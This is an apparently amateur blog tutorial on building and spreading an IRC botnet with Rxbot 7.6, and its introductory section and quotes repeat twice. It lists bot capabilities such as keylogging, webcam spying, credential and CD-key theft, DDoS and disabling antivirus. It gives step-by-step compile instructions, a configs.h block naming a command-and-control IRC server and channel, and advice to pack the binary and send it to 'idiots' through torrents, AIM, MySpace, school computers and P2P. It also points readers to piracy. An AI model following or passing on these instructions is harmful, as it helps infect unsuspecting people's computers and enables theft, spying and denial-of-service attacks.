This tutorial uses mIRC and other tools, which you will need to
download. You can find them via google or through pirating methods
listed in the Misc Hacks section of this app.
Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a bot joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a zombie.
Depending on the source you used, the bot can do several things.
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC Takeovers.
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !
Theres the infected computers bots the attacker, the server, and the slave.
Quote:
while the term botnet can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka bot herder) can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC bots. Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out low profile DDoS attacks and steal the CD keys for games, he explained. They had a huge weapon and didn't use as much as they could have done, Santorelli told El Reg. The main damage caused in the case is down to the cost of cleaning up infected PCs.
Botnets are being used for Google Adword click fraud, according to security watchers.
Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.
Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a bot joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a zombie.
Depending on the source you used, the bot can do several things.
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC Takeovers.
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !
Theres the infected computers bots the attacker, the server, and the slave.
Quote:
while the term botnet can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka bot herder) can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC bots. Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out low profile DDoS attacks and steal the CD keys for games, he explained. They had a huge weapon and didn't use as much as they could have done, Santorelli told El Reg. The main damage caused in the case is down to the cost of cleaning up infected PCs.
Botnets are being used for Google Adword click fraud, according to security watchers.
Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.
- Download and install Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
- Download and install the Service pack 6
- Download and install Windows SDK
- Open up Microsoft Visual C++ Compilier 6.0
- Go to Tools > Options and Click the Directories tab
-
Now, browse to these directories and add them to the list: (Click the dotted box to add)
C:PROGRAM FILESMICROSOFT PLATFORM SDK
C:PROGRAM FILESMICROSOFT PLATFORM SDKBIN
C:PROGRAM FILESMICROSOFT PLATFORM SDKINCLUDE
C:PROGRAM FILESMICROSOFRT PLATFORM SDKLIB - Make sure they're in the order above (use the arrows to adjust the order)
- Download Rxbot 7.6
-
Open the Rxbot 7.6 > configs.h folder and edit these lines only:
Put in quotations:
char password[] = Bot_login_pass; // bot password (Ex: monkey)
char server[] = aenigma.gotd.org; // server (Ex: irc.efnet.net)
char serverpass[] = ; // server password (not usually needed)
char channel[] = #botz_channel; // channel that the bot should join
char chanpass[] = My_channel_pass; // channel password
Optional:
char server2[] = ; // backup server
char channel2[] = ; // backup channel
char chanpass2[] = ; //Backup channel pass - Make sure Microsoft Visual C++ is open
- Select File > Open Workspace
- Browse to your Rxbot 7.6 folder and open the rBot.dsw file
- Right Click rBot Files and click Build:
- rBot.exe will be in the Rxbot 7.6 > Debug folder !!! YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click Protect and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon